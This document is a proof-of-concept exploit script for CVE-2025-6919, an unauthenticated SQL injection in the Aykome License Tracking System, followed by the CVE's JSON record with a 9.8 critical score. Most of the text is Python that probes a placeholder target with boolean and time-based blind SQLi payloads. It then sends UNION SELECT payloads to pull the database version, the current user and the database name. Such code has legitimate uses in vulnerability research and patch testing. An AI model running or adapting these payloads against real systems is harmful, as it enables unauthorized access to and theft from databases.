CVE-2025-6919

# CVE-2025-6919 - Aykome License Tracking System SQL Injection PoC # Vulnerability: Unauthenticated SQL Injection via improper input neutralization # Affected: Aykome License Tracking System before version dated 06.10.2025 import requests import sys TARGET_URL = "http://target-host/path-to-vulnerable-endpoint" def detect_sql_injection(url, param_name="id"): """Detect SQL injection vulnerability""" # Normal request normal_payload = "1" # Boolean-based test payload true_payload = "1' OR '1'='1" false_payload = "1' OR '1'='2" try: # Test for boolean-based blind SQLi r_true = requests.get(url, params={param_name: true_payload}, timeout=10) r_false = requests.get(url, params={param_name: false_payload}, timeout=10) if len(r_true.text) != len(r_false.text) and r_true.status_code == 200: print(f"[+] Boolean-based SQLi detected at parameter: {param_name}") return True # Test for time-based blind SQLi time_payload = "1' AND SLEEP(5)-- -" import time start = time.time() requests.get(url, params={param_name: time_payload}, timeout=15) elapsed = time.time() - start if elapsed >= 5: print(f"[+] Time-based SQLi detected at parameter: {param_name}") return True except Exception as e: print(f"[-] Error during detection: {e}") return False def exploit_union_sqli(url, param_name="id", columns=5): """Exploit UNION-based SQL injection to extract data""" # Build UNION SELECT payload nulls = ",".join([str(i) for i in range(1, columns + 1)]) union_payload = f"-1' UNION SELECT {nulls}-- -" try: r = requests.get(url, params={param_name: union_payload}, timeout=10) if r.status_code == 200: print(f"[+] UNION injection successful") print(f"[+] Response: {r.text[:500]}") return r.text except Exception as e: print(f"[-] Exploitation error: {e}") return None def extract_database_info(url, param_name="id"): """Extract database version and current user via SQLi""" payload = "-1' UNION SELECT 1,version(),current_user(),database(),5-- -" try: r = requests.get(url, params={param_name: payload}, timeout=10) if r.status_code == 200 and "error" not in r.text.lower(): print(f"[+] Database info extracted") return r.text except Exception as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": print(f"[*] Testing target: {TARGET_URL}") if detect_sql_injection(TARGET_URL): print("[*] Attempting data extraction...") exploit_union_sqli(TARGET_URL) extract_database_info(TARGET_URL)

{"cve": {"id": "CVE-2025-6919", "sourceIdentifier": "[email protected]", "published": "2025-10-13T13:15:32.617", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Cats Information Technology Software Development Technologies Aykome License Tracking System allows SQL Injection.This issue affects Aykome License Tracking System: before Version dated 06.10.2025."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0332", "source": "[email protected]"}]}}